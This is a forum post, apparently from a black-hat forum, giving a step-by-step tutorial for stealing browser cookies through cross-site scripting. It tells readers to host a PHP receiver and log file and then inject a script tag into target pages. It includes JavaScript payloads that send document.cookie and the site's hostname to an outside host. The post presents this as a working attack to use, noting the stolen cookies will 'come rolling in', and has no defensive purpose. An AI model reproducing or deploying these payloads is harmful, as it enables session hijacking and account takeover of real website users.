1. Copy and paste this script into textpad/notepad
2. Save as cookie.php.
3. Upload to your server.
4. Create a empty txt file called log.txt
5. Upload to your server in the same directory as cookie.php ensuring it has write permissions.
6. inject you cookie stealer script into whatever. an example would be
CODE
<script>document.location='http://www.yoururl.com/cookie.php?%27+document.cookie;
7. wait for the cookie data to come rolling in.
Here is the javascript code for the sender, all that I've really changed is that it will also send the host name to your receiver:
CODE
document.location='https://www.nulled.to/cookiesave.php?cookie=%27+document.cookie+%27&name=%27+window.location.hostname
For the PHP reciever, I've modified the fwrite because \n didn't work for me, and I'm assuming it probably didn't work for some others, chr(13) . chr(10) will enter a new line. I put in an if statement so if there isn't a cookie, or the hostname was not retrieved it won't save the cookie, so you don't get a bunch of blank lines. You might not care if the hostname is saved, in that case just remove the '&& !empty($name)' Also I'm having it type out, "Cookie=" and "Name=" If you don't understand that then you probably shouldn't even be in this tutorial.
All the content and Free SEO Tools on BestBlackHatForum.eu is user generated and linked to 3rd party websites. BestBlackHatForum.eu does not host any files at its servers, it basically provides an indexing service. BestBlackHatForum.eu; Its owners and its staff can not be held responsible for any type of content. To remove a link please contact webmaster via Contactus.